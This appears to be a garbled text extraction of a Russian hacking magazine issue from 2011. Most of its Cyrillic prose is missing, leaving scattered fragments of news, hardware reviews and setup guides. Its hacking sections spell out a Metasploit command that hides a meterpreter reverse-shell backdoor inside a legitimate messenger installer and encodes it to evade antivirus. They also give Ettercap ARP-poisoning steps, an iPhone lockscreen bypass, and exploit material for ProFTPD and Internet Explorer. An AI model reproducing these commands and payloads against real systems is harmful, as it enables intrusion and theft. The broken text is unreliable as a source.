210
:
: . 32
01 (144) 2011
2010
ICQ
CSRSS
VPN
AMAZON
INTRO
,
, .
,
Total Football Vogue :).
.
1. .
, 19. ,
.
.
27 28 :
.
, .
: 7 7,
:).
,
,
.
2. : habrahabr.ru/
company/xakep/blog/.
:
.
, ..
.
,
.
:
+154 3
.
,
, it.
3. www.xakep.ru, ,
, ,
,
. , ,
.
4.
, ,
:). :
.
!
nikitozz, .
nikitoz@real.xakep.ru
vkontakte.ru/club10933209 .
CONTENT
MegaNews
004
FERRUM
016
PC_ZONE
020
API Monitor
023
024
VPN Amazon
028
Internet Explorer 9:
032
API-
VPN-
078 JS-
Python
082
TO-5 2010
089
094
100
OpenSource
, ,
104
CSRSS
108
GUI
112
116
Linux BSD
, Windows 7
Mac OS X
036
Easy-Hack
040
046
050
054
ICQ: , ,
058
064
070
Top5 2010
134
074
X-Tools
140
FAQ UNITED
MALWARE
143
076
144
WWW2
HTTP-
ICQ
, TLS
SYN/ACK
120
124
128
PCI DSS
, ?
Zimbra:
/Internet Security
FAQ
8.5
web-
070
Top5 2010
094
OpenSource
082
TO-5
2010
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
> DVD
Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-
>
/PUBLISHING
>
, 115280, , .
,19, , 5 ,
21
.: +7 (495) 935-7034
: +7 (495) 545-0906
>
>
>.
>
>
>
>
>
>
>
> MAN TV
>
( )
(strekneva@gameland.ru)
>
>
>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>
>
/:
>
(kosheleva@gameland.ru)
>
>
>
> :
DVD-: claim@gameland.ru.
>
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
>
101000, ,
, / 652,
,
77-11802 14.02.2002
Lietuvas Rivas,
.
130 958 .
.
. ,
,
.
.
.
:
content@gameland.ru
, , 2010
MEGANEWS
X (magazine@real.xakep.ru)
MEGANEWS
P2P-. Dead Drop
, USB-,
. -,
5 . ,
Dead Drop
, . ,
, .
- :). deaddrops.com, . ,
. , offline- :).
9 Mozilla 6-
Firefox. 86% Google.
KINECT , KINECT
Microsoft,
Project Natal, Kinect.
.
, ,
. , Kinect :
.
4 2010 10 .
Adafruit Industries
Kinect. Xbox USB-, ,
. , RGB- ,
$1000 ( Kinect $150). , ,
Microsoft, ,
:). ,
11 , GitHub .
OpenKinect (www.openkinect.org)
, .
. , MIT
Kinect iRobot Create
, .
, KinetBot
3D .
( ) ,
YouTube.
004
X 01 (144) 2011
MEGANEWS
FACEBOOK-
Facebook, ,
.
Facebook . 500
Facebook, .
? eBay Facebook Mail
$500-700 ! ?,
. . , , ,
. ,
, SMS,
@facebook.
com.
,
. Office Web
Apps, Facebook mail
Microsoft Word, Excel PowerPoint. ?
. , , more fun, . , ,
500 , Facebook
, , GMail Google HotMail
Microsoft. , Facebook
fb.com, (American Farm Bureau) :).
.
,
,
, ,
, .
,
,
- . , , .
(firmware) ,
IMEI-,
.
.
. IMEI,
(
),
. :
IMEI ?
. :
, IMEI
006
.
.
,
. , ,
. :
, , ?
.
, , ,
. ,
.
X 01 (144) 2011
MEGANEWS
ANDROID
, Android. Black Hat, Intel.
. HTC Android . ,
.
proof-of-concept Google Market ( Angry Birds)
: , . Alert Logic
(, - Webkit).
: www.exploit-db.
com/exploits/15423. , , , , .
Android 2.2, 36% . ,
,
Android OS.
, Google, , .
Google Market, Android
2.2, , .
GOOGLE MAPS =
-. ,
,
, . ,
,
, ,
, -.
.
... Google Maps.
,
-,
-
. -
( ,
) , .
Google, ,
. ,
: 2007
,
, - GPS
. :
, Google Maps
Wikipedia.
Skype ,
. 22
25 . 560 .
, :
, ,
!. ,
,
, .
-
008
(RIAA)
. Facebook
RIAA,
- ,
!
RIAA
ZEUS
,
ZeuS, , .
,
, -,
. ,
ZeuS ,
.
,
.
.
,
, .
,
, , ,
(MDAC, Adobe Reader, Windows Help Center, Java),
ZeuS.
, , ?
, . ,
,
, ,
ZeuS-.
:
, ,
..
,
, .
,
,
.
.
- , 11
., ,
.
240 ,
.
-
:
~90 ,
. ,
:
,
. ,
(: )
.,
(:
) .. :
. ,
,
. 49.5%
294.000
Ru-Center. ,
,
. ,
. , ,
,
.
: ,
. Ru-Center,
, ,
,
, .
,
. 19
14 .
-
. (
) .
.
glassdoor.com. ,
IT-, , - (Software Engineer). , Facebook
$110 500 , $11 900 . Cisco $105 720
$8 529 Yahoo $101 638 $6 197 . , ,
Apple, Microsoft Google .
$99 127 , Google $98 814 (
: $21 364). Microsoft . , . ,
CEO Google, , (
20 000 ) 10%, $1000. , Google
Facebook.
X 01 (144) 2011
009
MEGANEWS
! , AVK.Dumx.A Trojan,
(
),
.
, ,
, , .
,
$300 000,
SMS . ,
, . , -
SMS-
,
( ,
)
. ,
, .
.
SMS
-.
,
IT- ,
,
,
, -
. ,
.
W3Techs ,
,
, : PHP 74.9%, ASP.NET 23.8% Java 3.9%.
AMD
, Czernobyl,
,
.
Czernobyl ,
AMD ( Athlon
XP) x86. ,
, www.woodmann.
com ( ,
). ,
,
,
. ,
.
. AMD , ,
,
,
010
. ,
Czernobyl
,
.
- ,
, .
X 01 (144) 2011
E-Ink
.
.
. E Ink
E Ink Triton,
4096 16 . ,
-,
, .
Triton -
: ,
(
). ?
.
20% Pearl,
Kindle Kindle DX.
, Triton -
.
, , Hanvon
Technology. 80%
. ,
9.68- (800600) Wi-Fi 3G,
$440. E Ink
LG Display.
Google
Tier 1. 2010 5%
, 6.4%.
Google 80%.
IPHONE
$40 000 17- - , iPhone 4. ,
, . ,
,
Apple. ? ,
. iPhone
4 , .
, , , Foxconn.
,
$130 .
, Home, , .
$279. ,
$169. ,
: www.whiteiphone4now.com.
X 01 (144) 2011
011
MEGANEWS
Group-IB,
20%
. ,
$1 .
ICQ
AOL
ICQ
Digital
Sky Technologies (DST),
Mail.ru Group, $187.5 .
, ICQ
,
Mail.ru ,
DST.
, ,
ICQ-
. .
Windows 8
2012,
Microsoft.
012
, ,
.
. ,
,
. , ,
,
.
, $28 .
.
,
(
NFC Near Field Communication).
BlingTag, (RFID). ,
,
,
PayPal
(, ). SMS
.
, PayPal
, ,
Bling Nation.
$100,
49 .
. ,
eBay
PayPal.
.
BlingTag 20 000 ,
. ,
,
Bling Nation,
.
,
BlingTag
.
X 01 (144) 2011
, , .
?
, ,
, .
K750 Logitech .
!
, . , K750
( ?) ,
,
.
8 .
2.4 AES
128- ( Logitech Unifying ).
$80,
,
:).
Google
, Chrome.
, : YouTube, Orkut, Blogger,
Google Docs Gmail. $500 $3133.7.
X 01 (144) 2011
,
, Cyborg R.A.T.9 Mad
Catz .
R.A.T. , ,
.
: 25 5600
25 . , 2.4
( 1 ).
1000 , ,
, 6
/.
,
. : ,
, ,
, .
6 . , Cyborg R.A.T.9
,
. , -
9 4
.
, Cyborg R.A.T.9
5- .
, ,
. $150.
013
MEGANEWS
SDD ZALMAN
, Zalman
SDD-.
: S-Series N-Series.
SandForce, SSD
S-Series
JMicron. Zalman
- 2,5 SATA 3.0 Gbps,
TRIM Windows 7.
S
32, 64 128 ,
260 /. ,
, : 60 /
, 120 /
210 / . N
64
128 ,
280 270 /c
. .
32- S- $99.99,
N- $289.99.
MACBOOK AIR
Apple
MacBook Air.
-, Air
- -.
2 , ,
MacBook Air :
0.28
1.7 . , , : c
13.3- ( 1440x900
) 11.6" (
1366x768 ). 13.3-
: Intel Core 2 Duo 1.86 , 2
, -
128 256 NVIDIA
GeForce 320M 256 DDR3 SDRAM.
11- :
Intel Core 2 Duo 1.4 , 2 , - 64
128 .
, 4 . -
014
,
Multi-Touch, FaceTime,
.
AirPort Extreme
Wi-Fi (802.11n) Bluetooth 2.1 + EDR.
,
:
$999 11.6-
(, ).
13.3- MacBook Air $1299.
, Apple
. ,
, 11-
,
.
( ,
),
. Apple ,
,
.
X 01 (144) 2011
FERRUM
SAMSUNG
SCX-4600
, /: 22
, : 10
: 1200X1200
, /: 22
: 1200X1200
, : 250
, : 64
, : 360
, : 416X409X275.8
, : 10.69
6500 P
,
,
. , , ,
. , ,
, . , .
, , .
,
, . Samsung SCX-4600
, ,
.
,
,
. ,
-,
Samsung SCX-4600 . ,
, , ,
:
, -
.
. ,
.
,
. , .
X 01 (144) 2011
- . ,
AnyPrint,
,
- ,
. , .
.
, ,
AnyPrint. ,
,
, ,
, .
, :
, ,
.
, ,
, ,
. : 10 ,
(
, , , ) Samsung SCX-4600
38 , 9 .
, .
Samsung SCX-4600 , . ,
, . z
015
FERRUM
CANYON CNR-WCAM820
CREATIVE LIVE!CAM OPTIA AF
GENIUS ISLIM 2020AF
LOGITECH C600
LOGITECH QUICKCAM SPHERE
MICROSOFT LIFECAM VX-5500
, ,
, -.
, , .
, .
, , , -?
,
. , , ,
-, ,
- . ,
. ,
, , ,
, . , ( , )
.
, . ,
.
( ),
! ,
,
,
016
.
, , , ,
(
). .
, ,
, . ,
,
,
. ,
.
,
:
,
. ,
. , .
,
/ . ,
,
, , , -
.
X 01 (144) 2011
1200 .
Canyon
CNR-WCAM820
:
, : 2,0
(), : 5,3
, /: 30
:
:
- , . Canyon CNR-WCAM820
: ( ) ,
, , . , ,
: ,
, . , ,
,
, .
, ,
. USB
, ,
.
, ,
.
X 01 (144) 2011
2900 .
Creative
Live!Cam Optia af
:
, : 2,0
(), : 7,7
, /: 30
:
:
. . , : .
, . ,
(F/2,9),
. ,
.
, , ,
YouTube .
, .
,
.
,
, ,
, .
017
FERRUM
3100 .
1700 .
Genius iSlim
2020AF
:
, : 2,0
(), : 8,5
: 1,3 9 /, 2 6 /
:
:
- , , , , .
.
,
, , - ,
, .
, - .
,
, . ,
: ,
. . .
018
Logitech
C600
:
, : 2,0
(), : 8,0
, /: 30
:
:
, ,
,
.
( , )
. , , , :
.
, , . ,
, , : ,
.
, .
.
X 01 (144) 2011
6000 .
2200 .
Logitech QuickCam
Sphere
Microsoft LifeCam
VX-5500
, : 2,0
(), : 8,0
, /: 30
:
:
, : 0,3
(), : 1,3
, /: 30
:
:
: , . ,
.
, ,
. ,
, ,
,
. , , . ,
, , .
, -
. ,
- .
, ,
, .
,
,
.
.
,
. ,
.
.
. ,
,
.
X 01 (144) 2011
019
PC_ZONE
oxdef.info;
API Monitor
API-
, , ,
, - .
, ,
,
. API-.
Windows
DLL, .. .
API-,
. ,
, ,
.. API-,
. (
)
.
, API. RegMon FileMon
. API-,
, . API-
API Monitor. ,
API COM-. , ,
.
API Monitor?
: 1.5
2001 .
020
. !
.
,
.
.
Summary, ,
API: , DLL,
, API-
. ,
, .
10 000 API-
166 DLL', 700 600 COM-
( Shell, Browser, DirectShow, DirectSound, DirectX ..).
API
MSDN.
API Capture Filter API-,
. , API Monitor
GUID, IID REFIID , .
MSDN.
API Monitor , .
. CreateFileW
X 01 (144) 2011
API Monitor
dwSareMode. , ,
1, , ?
(
Parameters Decode Parametres
Values), API Monitor
FILE_SHARE_READ | FILE_SHARE_WRITE".
API-
, .
, ,
,
API- .
, ReadFile
lpBuffer API
Monitor' lpNumberOfBytesRead
( ) .
, ( Hex Buffer),
,
. , ,
,
.
Summary
, ,
API-.
, .
Call Stack,
.
API , , .
GetLastError, CommDlgExtendedError, WSAGetLastError.
, NTSTATUS
HRESULT . , Notepad
CreateFile, API Monitor
X 01 (144) 2011
Firefox
, . , 5,
.
API Monitor
64- .
32- 64- . , 32-
32- .
32- 64-
Windows, 32- API
Monitor.
hook
, API Monitor
. : /
, .
,
. ,
, API- CreateFileA, CreateFileW
NtCreateFile, .
API Capture Filter. ,
, , , , ,
.
(Ctrl-F Edit Find), -
DVD
dvd
DVD-
021
PC_ZONE
API-
WinApiOverride
API- , API, . ,
, .
kerberos
WinAPI-. API, ,
.
*.rep .
GMail
APISpy32
APISpy32 WinAPI. ,
.
CreateFile. API Monitor
. . ,
Running Processes,
API Monitor'.
. File Hook Process,
Windows notepad.exe (
). , ,
- .
.
. ,
, .
API Monitor. Summary
, Notepad'.
CreateFileW
kernel32.dll, , , NtCreateFile.
:
.
. NtCreateFile STATUS_
OBJECT_NOT_FOUND, kernel32.dll Nodepad
INVALID_HANDLE_VALUE 2 =
.
, - ,
API Monitor. , NtCreateFile
STATUS_SUCCESS .
.
SSL-
, API
Monitor, , API-.
, ,
SSL-, .
API Monitor , ,
. , , , , -
. Internet Explorer:
1. , SSL. Gmail.
2.
Windows Internet. : API Monitor
.
3. Running Processes Internet Explorer
(Hook).
4. ,
022
GMail
.
Google SSL-. API- .
5. , API Monitor, API HttpSendRequestW. ,
: , , , . lpOptional
(Post-Call Value). , Hex Buffer
, Internet Explorer .
, ASCII.
, .
Firefox, Windows Internet Netscape
Portable Runtime Mozilla SSL. , API Monitor
. , , PR_Write. Firefox',
. Summary PR_Write,
xul.dll. . POST- ,
buf. , POST /
accounts/ServiceLoginAuth ( Hex Buffer). Pre-Call Value ,
. . , API Monitor
. ,
Tools Options Maximum size of
captured buffers. .
API-, , API-,
(. ). ,
, API Monitor , .
DLL-, XML-,
.z
X 01 (144) 2011
PC_ZONE
Step twitter.com/stepah
. . ,
, ,
, . ,
.
, ,
, ,
. ,
, ,
, .
+2
, ,
,
. :).
, . , , , ,
. ,
. : 22" 24"
6 8
.
,
. , ,
, ,
, -
. ,
, ,
.
.
,
. , ,
, ,
. , ,
. -
,
, Google Docs,
DropBox. , .
, ,
X 01 (144) 2011
.
- .
. .
,
,
. ,
,
(,
),
.
,
. , -
,
(
).
, ,
Synergy+ (www.synergy-foss.org).
: .
, :
. ,
.
Windows, Linux Mac OS X.
,
, ,
Synergy
. (
,
) .
GUI-.
:
1. Share this computer's
keyboard and mouse (server).
2. Configure.
3. Screens
.
+ Screen Name (
!),
.
4. ,
,
.
.
.
. .
5. Test ( ,
) Start.
:
1. Use another computer's
shared keyboard and mouse (client).
2. Other
Computer's Host Name.
3. Test
,
Start.
,
. , . , Synergy Ubuntu Mac OS X:
GUI- ,
. z
023
PC_ZONE
Step twitter.com/stepah
VPN Amazon
VPN-
Amazon .
, , ,
, , ,
VPN-.
Amazon , : Amazon
Elastic Compute Cloud ( EC2), Amazon Elastic Block
Store ( EBS), Amazon Simple Storage Service ( S3).
.
024
, cloud computing .
EC2
.
, .
Instance.
, , root SSH ( Linux) RDP ( Windows).
.
, .
:
.
, , . .
.
Amazon EBS. :
X 01 (144) 2011
AWS
25 , .
, .
Volume
.
, ,
.
S3
, .
, , .
, :10 , 1 5000
, (5 ).
, AWS Free Usage
Tier .
, . . ,
750
EC2 ( ,
), 10 EBS
( , ,
, Ubuntu) 5 S3.
Amazon,
.
,
, , ,
.
.
VPN-,
!
Ubuntu
Amazon' . AWS (aws.amazon.com)
Sing up Now.
I am a new user
Amazon.
,
. : ,
. Amazon $1-2, .
Visa MasterCard:
, Qiwi.
Amazon .
(EC2, EBS, S3
..).
. , 4-
PIN-,
. . EC2 S3
: Access Key ID Secret Access Key,
DVD
dvd
AWS.
X 01 (144) 2011
025
PC_ZONE
EC2
- AWS,
, .
Elasticfox Firefox.
AWS Access Key AWS Secret Access Key.
, Amazon
(s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip)
EC2.
Java Runtime Environment.
Amazon EC2
X.509 Certificate. ,
-, : Amazon
.
AWS (aws.amazon.com/
console). ,
, EC2.
c EC2
,
(.. ) .
99.95%
.
Launch Instance ().
.
: Small Instance (Default) 1.7 GB of memory,
1 EC2 Compute Unit (1 virtual core with 1 EC2 Compute Unit), 160 GB of
instance storage, 32-bit platform $0.10 Unix $0.125
. , $0.10 $0.17 . ,
. ,
Amazon Micro
Instance. .
. AMI
(Amazon Machine Image), , ,
( , Apache, MySQL,
Memcached ..), (, ). .
AMI-
Amazon', . Community
AMIs 6000 Linux Windows.
Ubuntu.
AMI ,
15 EBS, 10
. , Ubuntu 10.04 ami-c2a255ab, 10 . ID
Install. , . ,
026
, .
Instances . , State Running ,
. . Public DNS
. : , IP-
. !
Elastics IPs
IP- .
: ,
. ,
IP-, .
SSH,
. :
. , Security Group. ,
.
E2, Ubuntu.
SSH.
PuTTY. , Amazon pem,
PuTTY ppk. , PuTTYgen
: (Load private
key file), File.
SSH-
, :
Sessions IP- (Elastic IP)
Host Name;
Connection Data Auto-Login
ubuntu, ;
Connection SSH Auth
private-;
Session
Save.
, ,
Open.
.
PPTP
, PuTTY
, Ubuntu.
X 01 (144) 2011
VPN- Windows
sudo /etc/init.d/pptpd restart
SSH-
,
SSH- . .
, , SSH- . :
, . , ,
VPN-. : OpenVPN, PPTP-.
. OpenVPN
. PPTP ,
, GRE. .
, Ubuntu, PPTP- .
:
, . ,
VPN- . ,
NAT. ,
/etc/sysctl.conf :
net.ipv4.ip_forward=1
:
sudo sysctl -p
NAT, :
sudo iptables -t nat -A POSTROUTING -o eth0 -j
MASQUERADE
.
IP-,
.
2 /etc/pptpd.conf:
localip 192.168.242.1
remoteip 192.168.242.2-5
PPTP
192.168.242.1, 4 :
192.168.242.2 192.168.240.5.
DNS-. Amazon
(172.16.0.23), , , Google Publuc DNS.
/etc/ppp/pptpd-options:
ms-dns 8.8.8.8
PPTP-:
sudo echo <_> pptpd <> * >>
/etc/ppp/chap-secrets
<_> <>
. . /etc/ppp/chapsecrets ,
PPTP-:
X 01 (144) 2011
. :)
/etc/rc.local,
exit 0 :
iptables -t nat -A POSTROUTING -o eth0 -j
MASQUERADE
VPN . , - IP-
, . speedtest.net
. , , VPN
. Amazon 15
.
: 10 . :)
Amazon ( ) . . EC2 , .
.
VPN-.
: ,
,
- . ,
Amazon Instance GPU,
CUDA.
,
? z
027
PC_ZONE
lenskyi.d@gmail.com
INTERNET
EXPLORER 9:
-
Internet Explorer 9?
15 - Internet
Explorer 9. , .
,
. :)
028
X 01 (144) 2011
Internet Explorer
, IE ,
, . :
, . -,
, -. ,
. , . ,
Microsoft
Server is too busy :).
,
.
favicon, , , .
10 , , . NumRows HKEY_CURRENT_USER\
Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage.
, :
. ,
, ,
( 20-30 ), . ,
, .
. ,
, ,
: . ,
. Firefox'
.
- , Snap, Windows.
.. ,
( ),
.
. X 01 (144) 2011
,
. Windows 7,
IE .
Internet Explorer ,
. , ,
,
(, GMail)
.
029
PC_ZONE
. . , ,
,
. ,
, .
, , .
, ,
UI .
.
(XSS),
. Internet
Explorer .
,
.
Microsoft SmartScreen. ,
.
.
-. SmartScreen ( , -, IE
IE)
. , Internet Explorer .
. , - .
( IE InPrivate)
, ,
.
,
. ,
,
. , :
- , .
030
, .
, Microsoft
W3. IE9
Acid3, 95/100. 5
SVG- SMIL- SVG, . , ,
-,
.
HTML5, -
<video> <audio>. ,
( Silverlight
Flash'). ,
. , , IE9
-, .
<canvas>,
API Canvas 2D. HTML5,
. (
<canvas> ) IE9
Direct2D DirectWrite.
, . ,
DevTools.
( F12) ,
.
c HTML/CSS-,
JavaScript, User-Agent
HTTP-, .
. , , Fiddler (www.fiddler2.com/
fiddler), .
, ,
.
, , JavaScript
Format JavaScript, JavaScript
. . -,
, - . ,
.
Internet Explorer.
! z
X 01 (144) 2011
PC_ZONE
www.insight-it.ru
100
, . .
.
, - .
HighLoad++,
, , - -
032
.
, .
. :
X 01 (144) 2011
,
? ,
, , , ?
: = - + , .
:
, .
100% . ?
, ,
: ,
,
. , ,
.
Debian
Linux , ,
. HTTP- nginx,
reverse proxy.
, PHP-, . PHP- X 01 (144) 2011
mod_php Apache
, FastCGI,
,
. PHP- (, Facebook
PHP C HipHop),
-
XCache.
:
, , C
, MySQL . . ,
,
( ).
memcached. : ,
.
"" .
, ,
, , , . ,
033
PC_ZONE
99,5 .
40 ( ).
11 .
200 .
160/.
10 , 32
nginx ( Apache ).
30-40 , 2 , 5 , .
10 .
node.
js (
JavaScript ][ 08/2010) XMPP aka Jabber ( ).
ffmpeg, - VLC.
- ,
. ..
, .. .
. , , ,
,
. ,
, 20%.
,
DNS ( 32 IP-),
,
. ,
( )
,
memcached .
, ,
,
PHP-.
Facebook (
), Facebook
MySQL.
,
,
opensource .
( ),
.
, :
- 8- Intel ( ,
);
- 64 ;
- 8 ;
- RAID (
).
034
Agile
(),
: , , ,
.
(
), Debian.
,
.
memcached, ... ;
, .
.
, .
1 :).
, ,
. 4 -
,
, .
, Content Delivery
Network
.
, ,
. ,
: ? !.
, ,
( xfs) , . ,
,
:).
C. , ,
,
, , , ,
. ,
, TopCoder,
:
-
MySQL ,
.
memcached. (
).
.
GPL, -
.
X 01 (144) 2011
, . ,
, .
,
. 10001500
,
. -
, .
, - -
, , , YouTube,
, ,
.
, Jabber (
XMPP).
opensource . (
)
, XMPP . node.js ,
JavaScript ,
.
-.
,
:
, .
. 60-80
, 150 . TCP/HTTP-
HAProxy
,
.
( ,
MongoDB),
MySQL. 5-
, node.
js ( 4 ),
MySQL. X 01 (144) 2011
XMPP
,
, - ,
.
, .
,
,
.
, ,
:
IFrame- easyXDM
fastXDM,
.
.
- Twitter,
.
,
openGraph- (
<title> alt .
(YouTube, RuTube, Vimeo, ..).
WARNING
warning
.
,
,
.
,
/
.
.
,
, - . ,
,
, ,
.
, ,
. - 11
, 100 . z
035
GreenDog agrrrdog@gmail.com
Easy Hack
1
:
IPHONE
:
. , ,
:).
, (
, ,
), , , . ,
- . ,
.
, ,
. , , .
.
, .
1)
2):
Emergency Call
3) 3 :
###
4) Call Power
! Lockscreen Bypassed!
, -, . (
), , .
! ,
- , .
iOS 4.1,
. 4.2
,
, ...
. :).
:
EXE-,
:
,
IExpress,
exe', . ,
.
Metasploit' (metasploit.com).
msfencode exe- (payload),
exe-. -
.
. qip.exe.
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.101 R | ./msfencode -t exe d ~ -x qip.
exe -k -o q_bd101.exe -e x86/shikata_ga_nai -c 3
msfpayload -
(LHOST). (R).
msfencode. (-e x86/
shikata_ga_nai) (- 3).
exe- (-t exe). , exe- (-d ~ ), qip.exe (-x qip.exe).
-k , exe-.
q_bd101.exe (-o q_bd101.exe).
036
:)
Exe-, , ,
,
MSF.
, . -
, :).
. -,
, . - (
) .
.
-k, . -, , .
-, (15 42
virustotal.com), .
Windows! ,
CRC, . -
. ,
, .
! ,
X 01 (144) 2011
. ,
, , ,
, , -
, .
, :).
:
, , .
-, : ,
:). -, ,
, . ,
, ,
. remote_browser Ettercap-NG (ettercap.
sourceforge.net). -, -!
.
, ettercap.conf:
1) :
nano /etc/etter.conf
2) ec_uid, ec_gid :
ec_uid = 0
ec_gid = 0
3) remote_browser :
remote_browser = "firefox http://%host%url"
,
, .
- Ettercap:
1) ettercap:
Ettercap G
2)Sniff Unified sniffing;
3)Plugins Manage the plugins;
4) remote_browser;
5) :
Start Start sniffing
- -
.
, arp-poison. :
:
TCP/IP
:
-, , , , . :
, . , ,
TCP/IP,
( ). , ,
, ,
. . , ,
hping', - , .
, , Wireshark'a.
:).
.
, , , . Colasoft
Packet Builder (colasoft.com/packet_builder).
.
X 01 (144) 2011
arp-poison GTK-Ettercap-NG
1) :
Hosts Scan for hosts
2) :
Hosts Host list IP_router Add to T1
3) ():
Hosts Host list IPs Add to T2
4) arp-poison:
Mitm Arp poisoning Sniff remote connection
pcap- , tcpreplay:
tcpreplay i eth0 blah_blah.pcap
. -, , ,
. -, ,
.. , ,
. , , Win
Ettercap-NG.
, Windows. , .
, ,
Ethernet, ARP, IP,
TCP, UDP. , ,
:).
TCP/IP
037
,
, Wireshark. , Colasoft
Packet Builder cap-. Wireshark
pcap-, cap pcap ,
.
, ,
. TCP ( -
:
TCPDUMP'
), -
.
, Colasoft Packet Player.
. , tcpreplay,
, .
, .
, .
:
.
, , , , ,
, . . tcpdump
,
.
tcpdump , WireShark'
Capture Filter, .
.
tcpdump -w test.pcap -i eth0 host 192.168.0.101 and tcp
portrange 1-1024
-i eth0 ;
-w test.pcap , ;
host 192.168.0.101 , /
192.168.0.101;
:
NMAP
:
. , , :).
, - /,
, . . ,
.
( ), , IP- , .
, ,
idle-, Nmap (nmap.org). Antirez
1998 , ( )
ID IP , ..
, IPID.
.
- . - , .. .
, IPID . IPID.
TCP SYN- -
IP . , SYN-ACK. SYN-ACK
TCP- , RST-
, IPID.
, RST-, . RST- ,
IPID .
, SYN- , IPID,
, .
IPID .
038
-s 1550 , (
tcpdump' 96 );
net 192.168 , /
192.168;
not arp ARP-.
tcpdump -w test.pcap src 192.168.0.101 and ( tcp port
31337 or udp \( 4523 or 5543 \))
, 192.168.0.101,
31337 TCP, 4523, 5543 UDP.
, .
, , IP-, MAC- ..
OR, AND NOT. ,
||, &&, ! . , . ,
Don't Fragment IP-,
SYN- TCP. :).
( ), ,
. nmap.
org/book/idlescan.html.
, .
, , ,
.
,
. IPID, .
,
Nmap -
(-v). , IP ID Sequence Generation:
Incremental, . . , ,
.
NSE, (nmap.org/nsedoc/
scripts/ipidseq.html).
.
:
nmap -v 192.168.0.105
192.168.0.105 IP .
idle-c:
nmap -sI 192.168.0.105 -PN -v 192.168.0.1
-, IDS/, . , .
:
,
.
. l517 (
:). code.google.com/p/l517.
.
:
1) , .
2) , -.
3) .
4) -, .
5) (
).
5) , .
Win , , -.
,
. ,
. , ,
;).
. z
X 01 /144/ 2011
- Windows
039
(CISS Research Team, http://twitter.com/NTarakanov )
01
PROFTPD
if (buflen == 0) {
errno = EINVAL;
return NULL;
}
FTP Proftpd. ,
ZDI(Zero Day Initiative), 40 . ,
, ,
2 !
67-
e-zine'a phrack.
.
...
buflen--;
if (in_nstrm->strm_buf)
pbuf = in_nstrm->strm_buf;
else
pbuf = netio_buffer_alloc(in_nstrm);
TARGETS
while (buflen) {
...
while (buflen && toread > 0 &&
*pbuf->current != '\n' && toread--) {
cp = *pbuf->current++;
pbuf->remaining++;
BRIEF
-
pr_netio_telnet_gets() src/netio.c
, Telnet IAC (Interpret As
Command) escape-. ,
, FTP FTPS ,
.
-
mod_site_misc. ,
.
mod_site_misc
.
...
default:
*bp++ = TELNET_IAC;
buflen--; <-----
telnet_mode = 0;
break;
}
...
*bp++ = cp;
buflen--; <-----
}
...
EXPLOIT
properly_terminated_prev_command = TRUE;
*bp = '\0';
return buf;
.
pr_netio_telnet_gets(), src/netio.c:
}
char *pr_netio_telnet_gets(char *buf, size_t buflen,
pr_netio_stream_t *in_nstrm,
pr_netio_stream_t *out_nstrm)
{
char *bp = buf;
unsigned char cp;
040
, buflen
. , buflen , TELNET_IAC buflen 1,
! buflen , ,
X 01 (144) 2011
FltReleaseContext
,
. interger overflow,
buffer overflow.
Kingcope: exploitdb.com/exploits/15449. :
FreeBSD, Linux:Debuan,SUSE,CentOS. Debian Squeeze
ROP pool
buffer (cmd_rec res pr_cmd_read), Ubuntu ROP
: RWX , stub .
, Linux
(stack smashing protection) . , ! ookie
Ubuntu 24- ,
100% .
SOLUTION
proftpd-1.3.3c , , buflen,
:).
src/netio.c
.........
+/* In the situation where the previous byte was an IAC,
X 01 (144) 2011
02
INTERNET EXPLORER (CVE2010-3962)
TARGETS:
Websense Security Labs. , IE -
041
7dcb1c33
mov
call
7dcb1c38
mov
7dcb1c31
ecx,edi
mshtml!CDispNode::
SetBackground (7dcafe4b)
eax,dword ptr [edi] ; <-- -
mov
ecx,edi
call
dword ptr [eax+30h] ; <--
7dcb1c3a
7dcb1c3c
,
object[0], 0x30 .
, , , SetUserClip
.
CSS-.
PoC-, :
<html>
<table style=position:absolute;clip:rect(0)>
</html>
- :
mshtml!CLayout::EnsureDispNodeBackground+0x81:
7dcb1c2d
xor
esi,esi
7dcb1c2f
inc
esi
7dcb1c30
push
esi
042
mshtml!CDispNode::SetUserClip+0x84:
7dd8b5d0
call
mshtml!CRect::
RestrictRange (7dd89389)
7dd8b5d5
mov
eax,dword ptr [edi+4]
7dd8b5d8
and
eax,esi
7dd8b5da
movzx ecx, byte ptr mshtml!CDispNode::
_extraSizeTable (7dc31c10)[eax]
7dd8b5e1
mov
eax,edi
7dd8b5e3
shl
ecx,2
7dd8b5e6
sub
eax,ecx
7dd8b5e8
or
dword ptr [eax],1 ;<-- eax -
,
heap-spray, DEP/ASLR.
:
<html>
<head><title>poc CVE-2010-3962 zeroday</title>
<script>
X 01 (144) 2011
exploit-db.com/
exploits/15376.
SOLUTION
,
Workaround MS.
1. KB2458511.CSS:
TABLE
{
POSI\TION: relative !important;
}
2. :
regedit /e CSS-backup.reg "HKEY_CURRENT_USER\Software\
Microsoft\Internet Explorer\Styles"
X 01 (144) 2011
3. Apply_user_CSS.reg :
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Styles]
"User Stylesheet"="C:\\[directory location]\\KB2458511.css"
"Use My Stylesheet"=dword:00000001
03
TREND MICRO
TARGETS:
Titanium Maximum Security
Titanium Internet Security
BRIEF
. , ,
DeviceIoControl c IoctlCode 0x220404,
,
. / .
, Ioctl-
\\.\tmtdi-:
.text:0001DB7B loc_1DB7B:
.text:0001DB7B test dword_2289C, 10000000h
.text:0001DB85 mov
edi, [ebx+0Ch]
; edi
.text:0001DB88 jz
short loc_1DB95
.text:0001DB8A push offset aIoctrl_bind_cf
; "[IOCTRL_BIND_CFW]\n"
.text:0001DB8F call DbgPrint
.text:0001DB94 pop
ecx
.text:0001DB95 push edi ; VirtualAddress
.text:0001DB96 call esi ; MmIsAddressValid
.text:0001DB98 test al, al
.text:0001DB9A jz
loc_1DD19
043
,
NULL
